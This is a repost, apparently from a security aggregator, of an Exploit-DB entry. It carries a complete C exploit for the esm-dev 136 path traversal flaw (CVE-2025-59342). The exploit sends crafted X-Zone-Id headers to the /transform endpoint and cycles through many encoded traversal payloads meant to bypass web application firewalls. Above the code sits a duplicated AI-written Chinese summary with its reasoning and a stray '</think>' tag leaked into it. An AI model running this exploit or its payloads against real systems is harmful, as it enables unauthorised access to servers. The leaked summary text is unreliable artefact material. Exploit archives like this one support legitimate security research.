[webapps] esm-dev 136 - Path Traversal
好的,我现在需要帮用户总结一篇文章的内容,控制在100个字以内。用户提供的文章看起来是一个关于esm-dev 136版本的路径遍历漏洞的利用代码和详细描述。 首先,我需要理解文章的主要内容。文章标题提到了“Exploit Title: esm-dev 136 - Path Traversal”,所以这是一个针对esm-dev 136版本的路径遍历漏洞的利用方法。作者是Byte Reaper,日期是2025-07-11。漏洞编号是CVE-2025-59342。 接下来,文章中包含了一个C语言的exploit代码,主要功能是通过发送特定的HTTP请求来利用路径遍历漏洞。代码中使用了curl库来发送请求,并且构造了多个payload来尝试不同的路径遍历方式。目标端点是/transform,目标头是X-Zone-Id。 代码中还包含了处理响应、检测漏洞成功与否的逻辑。此外,还有一个bypass函数,用于尝试绕过WAF(Web应用防火墙)。 总结一下,这篇文章主要描述了一个针对esm-dev 136版本的路径遍历漏洞的详细利用方法,包括exploit代码、payload构造以及检测和绕过机制。 现在需要将这些内容浓缩到100个字以内,并且直接描述文章内容,不需要开头语。 </think> 这篇文章描述了一个针对esm-dev 136版本的路径遍历漏洞(CVE-2025-59342),展示了如何通过构造特定payload和HTTP请求来利用该漏洞。exploit代码使用curl库发送请求,并包含多种payload以测试不同路径遍历方式。目标端点为/transform,头信息为X-Zone-Id。代码还包括检测漏洞成功与否以及尝试绕过WAF的功能。 2025-12-16 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:7 收藏
好的,我现在需要帮用户总结一篇文章的内容,控制在100个字以内。用户提供的文章看起来是一个关于esm-dev 136版本的路径遍历漏洞的利用代码和详细描述。 首先,我需要理解文章的主要内容。文章标题提到了“Exploit Title: esm-dev 136 - Path Traversal”,所以这是一个针对esm-dev 136版本的路径遍历漏洞的利用方法。作者是Byte Reaper,日期是2025-07-11。漏洞编号是CVE-2025-59342。 接下来,文章中包含了一个C语言的exploit代码,主要功能是通过发送特定的HTTP请求来利用路径遍历漏洞。代码中使用了curl库来发送请求,并且构造了多个payload来尝试不同的路径遍历方式。目标端点是/transform,目标头是X-Zone-Id。 代码中还包含了处理响应、检测漏洞成功与否的逻辑。此外,还有一个bypass函数,用于尝试绕过WAF(Web应用防火墙)。 总结一下,这篇文章主要描述了一个针对esm-dev 136版本的路径遍历漏洞的详细利用方法,包括exploit代码、payload构造以及检测和绕过机制。 现在需要将这些内容浓缩到100个字以内,并且直接描述文章内容,不需要开头语。 </think> 这篇文章描述了一个针对esm-dev 136版本的路径遍历漏洞(CVE-2025-59342),展示了如何通过构造特定payload和HTTP请求来利用该漏洞。exploit代码使用curl库发送请求,并包含多种payload以测试不同路径遍历方式。目标端点为/transform,头信息为X-Zone-Id。代码还包括检测漏洞成功与否以及尝试绕过WAF的功能。 2025-12-16 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:7 收藏
# Exploit Title: esm-dev 136 - Path Traversal
# Date: 2025-07-11
# Exploit Author: Byte Reaper
#Vendor Homepage: https://github.com/esm-dev/esm.sh
# Software Link: https://github.com/esm-dev/esm.sh
# CVE-2025-59342
- File : exploit.c
- Date : 09/17/2025
- Target : esm-dev
- Version: 136
- Target Endpoint : /transform
- Target Header : X-Zone-Id
- Vuln :
- Run exploit :
# gcc exploit.c argparse.c -o CVE-2025-59342 -lcurl
# ./CVE-2025-59342
#include <curl/curl.h>
#include <string.h>
#include <stdlib.h>
#include "argparse.h"
#include <time.h>
#include <unistd.h>
#include <sys/utsname.h>
#define FULL_URL 2500
#define P_Y 2000
#define POST_DATA 9000
int flagPort = 0;
int port = 80;
int selectPort = -1;
int verbose = 0;
int code = 1;
int found = 1;
int cF = 0;
int s = 0;
int bY = 0;
int sP = 0;
const char* cookies = NULL;
const char* payload = NULL;
void exit64bit()
{
int n = 0;
__asm__ volatile
(
"mov $0x4A, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"syscall\n\t"
"test %%rax, %%rax\n\t"
"jz .aD\n\t"
"mov $0x0, %[var]\n\t"
"jmp .finish\n\t"
".aD:\n\t"
"mov $0x1, %[var]\n\t"
".finish:\n\t"
: [var] "+r" (n)
:
: "rax",
"rdi"
);
if (n == 0)
{
printf("\e[0;31m[-] sys_fsync syscall Faild.\n");
fflush(stdout);
}
else if (n == 1)
{
printf("[+] sys_fsync syscall Success.\n");
}
__asm__ volatile
(
"mov $0x0, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
:
:
: "rax",
"rdi"
);
}
struct Mem
{
char* buffer;
size_t len;
};
size_t write_cb(void* ptr, size_t size, size_t nmemb, void* userdata)
{
size_t total = size * nmemb;
struct Mem* m = (struct Mem*)userdata;
char* tmp = realloc(m->buffer, m->len + total + 1);
if (!tmp) return 0;
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
int checkLen(int len, char* buf, size_t bufcap)
{
if (len < 0 || (size_t)len >= bufcap)
{
printf("\e[0;31m[-] Len is Long ! \e[0m\n");
printf("\e[0;31m[-] Len %d\e[0m\n", len);
return 1;
}
else
{
printf("\e[0;34m[+] Len Is Not Long.\e[0m\n");
return 0;
}
return 0;
}
const char* payloads[] =
{
"..//..//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa//",
"..../..../m.o.d.u.les/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
"..\\/..\\/modules\\/transform\\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\\/",
".//.//m?odu?le?s/tran.sfo.rm/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
"..%252f%252f..%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f",
"%252e%252e%252f%252f%252e%252e%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f",
"..%2f%2f..modules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f",
"%2e%2e%2f%2f%2e%2emodules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f",
"..%255c%255c..%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c",
"%252e%252e%255c%255c%252e%252e%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c",
"%u002e%u002e%u2215%u2215%u002e%u002e%u2215%u2215modules%u002e%u002etransform%u002e%u002ec245626ef6ca0fd9ee37759c5fac606c6ec99daa%u002e",
"%u002e%u002e%u2216%u2216%u002e%u002e%u2216%u2216modules%u2216%u2216transform%u2216%u2216c245626ef6ca0fd9ee37759c5fac606c6ec99daa%u2216",
"%e0%40%ae%e0%40%ae%e0%80%af%e0%80%af%e0%40%ae%e0%40%ae%e0%80%af%e0%80%afmodules%e0%80%af%e0%80%aftransform%e0%80%af%e0%80%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%e0%80%af",
".%00.//.%00.//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
"..;//..;//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
"%c0%2e%c0%2e%c0%af%c0%af%c0%2e%c0%2e%c0%af%c0%afmodules%c0%af%c0%aftransform%c0%af%c0%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%c0%af",
NULL
};
static void request(const char *baseurl)
{
CURL* curl = curl_easy_init();
const char *mes3 = "\e[0;34m[+] Create Object CURL Success.\n";
const char *mes4 = "\e[0;31m[-] Error Create Object CURL !\e[0m\n";
size_t len3 = strlen(mes3);
size_t len4 = strlen(mes4);
__asm__ volatile
(
"cmp $0x0, %[curlO]\n\t"
"je .donV\n\t"
".erD:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"mov %[msg], %%rsi\n\t"
"mov %[len], %%rdx\n\t"
"syscall\n\t"
"jmp .finishC\n\t"
".donV:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"mov %[msg1], %%rsi\n\t"
"mov %[len1], %%rdx\n\t"
"syscall\n\t"
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
".finishC:\n\t"
:
: [curlO] "r" (curl),
[msg] "r" ((const char *)mes3),
[len] "r" ((long)len3),
[msg1] "r" ((const char*)mes4),
[len1] "r" ((long)len4)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
struct Mem response;
CURLcode res;
response.buffer = NULL;
response.len = 0;
const char* mes5 = "\e[0;34m[+] Buffer Clean Success.\e[0m\n";
size_t len5 = strlen(mes5);
__asm__ volatile (
"test %[buffer], %[buffer]\n\t"
"jz L_print_clean\n\t"
"L_continue:\n\t"
"jmp L_done\n\t"
"L_print_clean:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"movq %[msg13], %%rsi\n\t"
"mov %[len13], %%rdx\n\t"
"syscall\n\t"
"L_done:\n\t"
:
: [buffer] "r" ((const char*)response.buffer),
[msg13] "r" (mes5),
[len13] "r" (len5)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
char full[FULL_URL];
if (flagPort != 0)
{
const char* mes8 = "\e[0;31m[-] Select Port is NULL !\e[0m\n";
size_t len8 = strlen(mes8);
__asm__ volatile (
"test %[var22], %[var22]\n\t"
"jnz L_finish\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[msg13], %%rsi\n\t"
"mov %[len13], %%rdx\n\t"
"syscall\n\t"
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
"L_finish:\n\t"
:
: [var22] "r" (selectPort),
[msg13] "r" (mes8),
[len13] "r" (len8)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
printf("\e[0;34m[+] Port Select : %d\e[0m\n",
selectPort);
int len1 = snprintf(full,
FULL_URL,
"%s:%d/transform",
baseurl,selectPort);
if (checkLen(len1,
full,
FULL_URL) == 1)
{
fprintf(stderr,
"\e[0;31m[-] Error write base url !\e[0m\n");
exit64bit();
}
printf("\e[0;34m[+] Write base URL success.\e[0m\n");
}
else if (flagPort == 0)
{
printf("\e[0;34m[+] Auto port : %d\e[0m\n", port);
int len2 = snprintf(full,
FULL_URL,
"%s:%d/transform",
baseurl,
port);
if (checkLen(len2, full, FULL_URL) == 1)
{
fprintf(stderr,
"\e[0;31m[-] Error write base url !\e[0m\n");
exit64bit();
}
printf("\e[0;34m[+] Write base URL success.\e[0m\n");
}
printf("[+] Base URL : %s\n", baseurl);
printf("[+] Result full url : %s\n", full);
char post[POST_DATA];
int len9 = snprintf(post, POST_DATA, "{\"filename\":\"cve.js\",\"lang\":\"js\",\"code\":\"console.log('Exploit!');\",\"importMap\":{\"imports\":{\"react\":\"https://esm.sh/react\",\"react-dom\":\"https://esm.sh/react-dom\"}},\"jsxImportSource\":\"react\",\"target\":\"es2022\",\"sourceMap\":\"external\",\"minify\":true}");
if (checkLen(len9, post, POST_DATA) == 1)
{
fprintf(stderr,
"[-] Error write post data !\e[0m\n");
exit64bit();
}
printf("\e[0;34m[+] Write Post data Success.\e[0m\n");
printf("\e[0;35m[+] Post data :===================================\e[0m\n");
printf("%s\n", post);
printf("\e[0;32m[+] Size : %d\e[0m\n", POST_DATA);
printf("\e[0;32m[+] Len : %zu\e[0m\n", strlen(post));
printf("\e[0;35m==================================================\e[0m\n");
curl_easy_setopt(curl,
CURLOPT_URL,
full);
curl_easy_setopt(curl,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
if (cF)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_POST,
1L);
curl_easy_setopt(curl,
CURLOPT_POSTFIELDS,
post);
curl_easy_setopt(curl,
CURLOPT_POSTFIELDSIZE,
(long)strlen(post));
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
struct timespec rqtp, rmtp;
rqtp.tv_sec = 1;
rqtp.tv_nsec = 500000000;
register long r10R asm("r10");
r10R = 0;
printf("\e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...\e[0m\n",
rqtp.tv_sec, rqtp.tv_nsec);
int ret;
__asm__ volatile
(
"syscall"
: "=a"(ret)
: "a"(0xE6),
"D"((long)0),
"S"((long)0),
"d"(&rqtp),
"r"(r10R)
: "rcx",
"r11",
"memory"
);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
struct curl_slist* headers = NULL;
headers = curl_slist_append(headers,
"User-Agent: Den/8.7.1");
headers = curl_slist_append(headers,
"Accept: */*");
headers = curl_slist_append(headers,
"Connection: keep-alive");
headers = curl_slist_append(headers,
"Content-Type: application/json");
headers = curl_slist_append(headers,
"Referer: http://localhost:9999/");
if (s!=0)
{
printf("[+] Your Payload : %s\n", payload);
printf("\e[0;33m[+] Checking payload...\n");
if (strstr(payload, "../") || strstr(payload, "..\\"))
{
printf("\e[0;36m[+] Detected path traversal \"../\" in payload.\n");
}
else
{
printf("\e[0;31m[-] No path traversal detected. Please provide a valid payload.\n");
exit64bit();
}
if (strstr(payload, "/transform"))
{
printf("\e[0;36m[+] Detected endpoint '/transform' in payload.\n");
}
else
{
printf("\e[0;31m[-] Endpoint '/transform' not detected in payload!\n");
exit64bit();;
}
}
else
{
headers = curl_slist_append(headers,
"X-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/"); //auto payload
printf("[+] Auto payload ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/.\n");
}
curl_easy_setopt(curl,
CURLOPT_HTTPHEADER,
headers);
if (verbose)
{
curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
}
res = curl_easy_perform(curl);
curl_slist_free_all(headers);
if (res == CURLE_OK)
{
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
long httpcode;
double timeT;
double timeR;
char* urlD = NULL;
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpcode);
curl_easy_getinfo(curl,
CURLINFO_TOTAL_TIME,
&timeT);
curl_easy_getinfo(curl,
CURLINFO_REDIRECT_TIME,
&timeR);
curl_easy_getinfo(curl,
CURLINFO_REDIRECT_URL,
&urlD);
printf("\e[0;32m[+] Delayed response : %f\e[0m\n", timeT);
printf("\e[0;34m[+] TIME REDIRECT: %.1f\e[0m\n", timeR);
if (urlD == NULL)
{
printf("\e[0;36m[+] Not REDIRECT Found.\e[0m\n");
}
else
{
printf("\e[0;34m[+] REDIRECT To : %s\e[0m\n", urlD);
}
printf("\e[0;32m[+] HTTP CODE : %ld\n", httpcode);
if (response.buffer != NULL)
{
printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n");
printf("%s\n", response.buffer);
printf("\e[0;32m[+] Size Pointer response : %d\e[0m\n", sizeof(response.buffer));
printf("\e[0;32m[+] Len : %zu\e[0m\n", response.len);
printf("\e[0;35m==========================================================================================================\e[0m\n");
}
else
{
printf("\e[0;31m[-] Error show buffer : NULL response !\n");
__asm__ volatile
(
"mov $0x0, %%rdi\n\t"
"mov $0xE7, %%rax\n\t"
"syscall\n\t"
:
:
:"rax",
"rdi"
);
}
printf("===========================================================================================================\n");
if (httpcode >= 200 && httpcode < 300)
{
const char* words[] =
{
"Exploit!",
"cve.js",
"mjs",
"console",
"code",
"map",
"AAAA",
"IAAI",
"names",
NULL
};
printf("\e[0;32m[+] Http code (200 - 300)\e[0m\n");
printf("\e[0;33m[+] Check Word in response...\e[0m\n");
for (int u = 0; words[u] != NULL; u++)
{
code = 1;
if (strstr(response.buffer, words[u]) != NULL)
{
printf("[+] Word found in response : %s\n",
words[u]);
__asm__ volatile
(
"mov $0x0, %[var12]\n\t"
: [var12] "=r" (found)
:
:
);
break;
}
}
if (found == 0)
{
printf("\e[0;36m[+] Words were found in the server's response, indicating that the exploitation was likely successful.\e[0m\n");
}
const char *mes11 = "\e[0;31m[-] Not found words in response !\e[0m\n";
size_t len11 = strlen(mes11);
__asm__ volatile
(
"test %[var11], %[var11]\n"
"jnz notZero\n\t"
"jmp finish11\n\t"
"notZero:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"movq %[size11], %%rsi\n\t"
"mov %[len11], %%rdx\n\t"
"syscall\n\t"
"finish11:\n\t"
:
: [var11] "r" ((int)found),
[size11] "r" ((const char *)mes11),
[len11] "r" (len11)
:"rax",
"rdi",
"rsi",
"rdx",
"r11",
"rcx",
"memory"
);
}
else
{
printf("\e[0;31m[-] Http code Not range (200 - 300)\e[0m\n");
printf("\e[0;31m[-] Please check url and port.\e[0m\n");
}
printf("\e[0;35m[+] Result Exploit :\e[0m\n");
if (code == 1 && found == 0)
{
printf("\e[0;36m[+] HTTP code positive and expected word found: Exploit succeeded (CVE-2025-59342).\e[0m\n");
}
else if (code == 1 && found != 0)
{
printf("\e[0;36m[+] HTTP code positive but expected word not found: Partial success (CVE-2025-59342).\e[0m\n");
}
else if (code != 1 && found == 0)
{
printf("\e[0;31m[-] HTTP code negative but word found: Unexpected result (CVE-2025-59342).\e[0m\n");
}
else
{
printf("\e[0;31m[-] Exploitation did not succeed.\e[0m\n");
}
}
else
{
printf("\e[0;31m[-] Error Send Request !\e[0m\n");
printf("\e[0;31m[-] Error : %s\n", curl_easy_strerror(res));
exit64bit();
}
curl_easy_cleanup(curl);
free(response.buffer);
}
void bypass(const char* urlB)
{
struct Mem responseBypass;
responseBypass.buffer = NULL;
responseBypass.len = 0;
const char* mes14 = "\e[0;34m[+] Buffer Clean Success.\e[0m\n";
size_t len14 = strlen(mes14);
__asm__ volatile (
"test %[buffer1], %[buffer1]\n\t"
"jz L_print_clean1\n\t"
"L_continue1:\n\t"
"jmp L_done1\n\t"
"L_print_clean1:\n\t"
"mov $0x1, %%rax\n\t"
"mov $0x1, %%rdi\n\t"
"movq %[msg14], %%rsi\n\t"
"mov %[len14], %%rdx\n\t"
"syscall\n\t"
"L_done1:\n\t"
:
: [buffer1] "r" ((const char*)responseBypass.buffer),
[msg14] "r" (mes14),
[len14] "r" (len14)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
CURL* curl = curl_easy_init();
if (curl == NULL)
{
fprintf(stderr,"[-] Error Create Object CURL !\n");
exit64bit();
}
CURLcode res1;
char postData[POST_DATA];
int len15 = snprintf(postData,
POST_DATA,
"{\"filename\":\"cve.js\",\"lang\":\"js\",\"code\":\"console.log('Exploit!');\",\"importMap\":{\"imports\":{\"react\":\"https://esm.sh/react\",\"react-dom\":\"https://esm.sh/react-dom\"}},\"jsxImportSource\":\"react\",\"target\":\"es2022\",\"sourceMap\":\"external\",\"minify\":true}");
if (checkLen(len15,
postData,
POST_DATA) == 1)
{
fprintf(stderr,
"[-] Error write post data !\e[0m\n");
exit64bit();
}
if (curl)
{
for (int i = 0; payloads[i] != NULL; i++)
{
struct curl_slist* h = NULL;
char fullURL[FULL_URL];
snprintf(fullURL,
FULL_URL,
"%s/transform",
urlB);
char hLine[1024];
snprintf(hLine,
1024,
"X-Zone-Id: %s",
payloads[i]);
h = curl_slist_append(h, hLine);
h = curl_slist_append(h,
"User-Agent: Den/8.7.1");
h = curl_slist_append(h,
"Content-Type: application/json");
curl_easy_setopt(curl,
CURLOPT_URL,
fullURL);
curl_easy_setopt(curl,
CURLOPT_HTTPHEADER,
h);
if (cF)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_POSTFIELDS,
postData);
curl_easy_setopt(curl,
CURLOPT_POSTFIELDSIZE,
(long)strlen(postData));
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&responseBypass);
struct timespec rqtp, rmtp;
rqtp.tv_sec = 1;
rqtp.tv_nsec = 500000000;
register long r10R asm("r10");
r10R = 0;
printf("\e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...\e[0m\n",
rqtp.tv_sec, rqtp.tv_nsec);
int ret;
__asm__ volatile
(
"syscall"
: "=a"(ret)
: "a"(0xE6),
"D"((long)0),
"S"((long)0),
"d"(&rqtp),
"r"(r10R)
: "rcx",
"r11",
"memory"
);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
res1 = curl_easy_perform(curl);
curl_slist_free_all(h);
if (res1 == CURLE_OK)
{
long httpC;
printf("---------------------------------------------------------------------------------------------------\n");
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
printf("[+] Payload Test : %s\n", payloads[i]);
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpC);
printf("[+] Http code : %ld\n",
httpC);
if (responseBypass.buffer != NULL)
{
printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n");
printf("%s\n", responseBypass.buffer);
printf("\e[0;35m==========================================================================================================\e[0m\n");
if (httpC == 501 || strstr(responseBypass.buffer,
"Unsupported method") != NULL)
{
printf("[-] Please check target URL, The server does not support the POST request.\n");
}
else
{
__asm__ volatile("nop");
}
}
else
{
printf("[-] Response NULL !\n");
exit64bit();
}
if (httpC >= 200 && httpC < 300)
{
if (code == 0)
{
printf("[+] Bypass Waf Success.\n");
}
else
{
printf("[-] The server's response is still negative !\n");
}
if (responseBypass.buffer != NULL)
{
printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n");
printf("%s\n", responseBypass.buffer);
printf("%zu\n", responseBypass.len);
printf("\e[0;35m==========================================================================================================\e[0m\n");
free(responseBypass.buffer);
responseBypass.buffer = NULL;
responseBypass.len = 0;
}
else
{
printf("[-] Response NULL (Bypass WAF) !\n");
exit64bit();
}
}
else
{
printf("[-] Http code Not 200-300 !\n");
printf("[+] Waf detect OR check input base url / port.\n");
}
}
}
}
else
{
printf("[-] Error Send Request !\n");
}
curl_easy_cleanup(curl);
}
int main(int argc,
const char** argv)
{
printf("\e[1;37m+-----------------------+\e[0m\n");
printf("\e[1;37m| Author : Byte Reaper |\e[0m\n");
printf("\e[1;37m| CVE : CVE-2025-59342 |\e[0m\n");
printf("\e[1;37m| Vuln : Path Traversal |\e[0m\n");
printf("\e[1;37m+-----------------------+\e[0m\n");
printf("\e[1;30m------------------------------------------------------------------------\e[0m\n");
printf("[+] Check Your os...\n");
struct utsname os;
__asm__ volatile
(
"mov %0, %%rdi\n\t"
"mov $0x3F, %%rax\n\t"
"syscall\n\t"
:
: "r"(&os)
: "rax",
"rdi"
);
printf("\e[0;36m[+] System Name: %s\e[0m\n", os.sysname);
printf("\e[0;36m[+] Machine : %s\e[0m\n", os.machine);
if (strstr(os.sysname, "Linux") != NULL)
{
printf("\e[0;36m[+] Linux OS, Check Machine architecture...\e[0m\n");
}
else
{
printf("[-] OS Not Linux 64 bit (%s),Exit...\e[0m\n", os.sysname);
printf("[+] Please RUN exploit in linux.\n");
exit64bit();
}
if (strstr(os.machine, "x86_64") != NULL)
{
printf("\e[0;36m[+] Machine architecture is 64 bit, run exploit...\e[0m\n");
}
else
{
printf("[-] OS Not architecture 64 bit (%s), Exit...\e[0m\n", os.machine);
exit64bit();
}
const char* url = NULL;
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&url,
"Enter Target URL."),
OPT_INTEGER('p',
"port",
&selectPort,
"Enter Target PORT."),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode."),
OPT_STRING('c',
"cookies",
&cookies,
"Enter File cookies."),
OPT_STRING('k',
"payload",
&payload,
"Enter Payload."),
OPT_BOOLEAN('b',
"bypass",
&sP,
"Arg Bypass WAF."),
OPT_END()
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!url)
{
printf("\e[0;31m[-] Please Enter Target IP OR URl !\e[0m\n");
printf("\e[0;31m[!] Exemple : ./CVE-2025-59342 -u http://TARGET\e[0m\n");
__asm__ volatile
(
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"1:\n\t"
"syscall\n\t"
:
:
: "rax",
"rdi",
"rsi"
);
}
if (verbose)
{
__asm__ volatile
(
"add $0x1, %[var6]\n\t"
: [var6] "+r" (verbose)
:
:
);
}
else
{
__asm__ volatile
(
"mov $0x0, %[var7]\n\t"
: [var7] "=r" (verbose)
:
:
);
}
flagPort = (selectPort != -1);
if (payload != NULL)
{
s = 1;
}
else
{
s = 0;
}
if (sP)
{
bypass(url);
}
else
{
request(url);
}
printf("\e[0;36m[+] Finish Script.\n");
__asm__ volatile
("mov $0x3C, %%rax\n\t"
"mov $0x0, %%rdi\n\t"
"syscall\n\t"
:
:
:"rax", "rdi"
);
}
文章来源: https://www.exploit-db.com/exploits/52461
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh